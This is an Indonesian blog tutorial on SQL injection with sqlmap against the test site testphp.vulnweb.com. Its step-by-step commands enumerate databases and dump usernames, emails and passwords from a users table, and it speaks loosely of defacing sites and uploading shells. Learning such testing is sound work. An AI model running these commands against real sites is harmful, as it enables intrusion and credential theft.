Hacking Website dengan SQLMap Kali Linux
Kesempatan kali ini kita akan melakukan hacking website dengan Sqlmap, atau deface website.
Hacker melakukan ini terkadang untuk melihat informasi-informasi sensitif dari situs website. atau sekedar mengupload shell dll.
Kedua yaitu Sqlmap, sqlmap sendiri umumnya sebuah tool yang akan membuat trik Sql Injection jadi lebih mudah. Pada website official tool ini dijelaskan,
Baca juga,
"sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections."
Banya fitur yang terdapat pada tool ini tertera pada situsnya "Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems." dibawah ini sekalian cara menggunakan sqlmap linux.
Langsung ke langkah-langkahnya.
Hacking Website menggunakan SQLMap Kali Linux
Booting kali linux Anda lalu start terminal, ketik kode berikut,
sqlmap -hAkan menampilkan perintah-perinta yang support pada sqlmap.
Untuk memulai deface website, lanjut ke step berikutnya, ketik perintah dibawah,
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1terkadang kita membutuhkan kode --time-sec untuk mempercepat proses, disaat respon server slow/ lelet.
ketik
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15Setelah beberapa saat proses sqlmap selesai, sqlmap akan menampilkan versi mysql dan beberapa informasi pentig pada database.
Step berikutnya kita akan mendapatkan database name, column name, dan beberapa data penting pada dabase.
so kita akan mendapatkan names dari database, sama dengan kode sebelumnya hanya saja tambahkan kode --dbs pada akhir kode.
ketik
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
sekarang kita fokus pada acuart database. schema information adalah tabel database default yang mana berisi hal-hal yang tidak penting atau bukan tujuan yang kita cari.
Untuk itu tambahkan kode -D dan --tables untuk mengurutkan tabel database.
ketik
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
Kita sudah mendapatkan tabel, lanjut untuk mendapatkan data list dari column.
Sekarang kita spesifikasikan database dengan -D dan tables dengan -T request column dengan --columns.
Kita disini fokus pada tabel users, yang mana berisi data username dan password user yang telah teregister (hacker selalu mencari sensitive data)
maka final command akan seperti ini,
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
hasil..
Setelah anda mengikuti langkah-langkah diatas dengan benar, sekarang kita akan mendapatkan data dari kolom.
Seperti biasa kita menentukan database dengan -D, table dengan -T, dan kolom dengan -C. Kita akan mendapatkan semua data dari kolom yang ditentukan menggunakan --dump. Kita akan memasukkan beberapa nama kolom dan pisahkan dengan koma. Perintah akhir akan terlihat seperti ini.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dumpHasilnya..
John Smith, tentu. dan passwordnya adalah test, dan email email@email.com.
Tak sempurna tentunya, jelas. Namun pada dunia web pentesting sebenarnya anda akan mendapatkan data-data yang lebih sensitif lagi. dan dalam keadaan seperti itu hal yang baiknya Anda lakukan adalah memberi tahu si pemilik website untuk memperbaiki sistemnya, bukan mencuri data
Jangan pernah tergoda bergabung dengan Dark Side, Anda tidak akan terlihat cantik dibelakang Bar.Terimakasih..
0 Response to "Hacking Website dengan SQLMap Kali Linux"
Post a Comment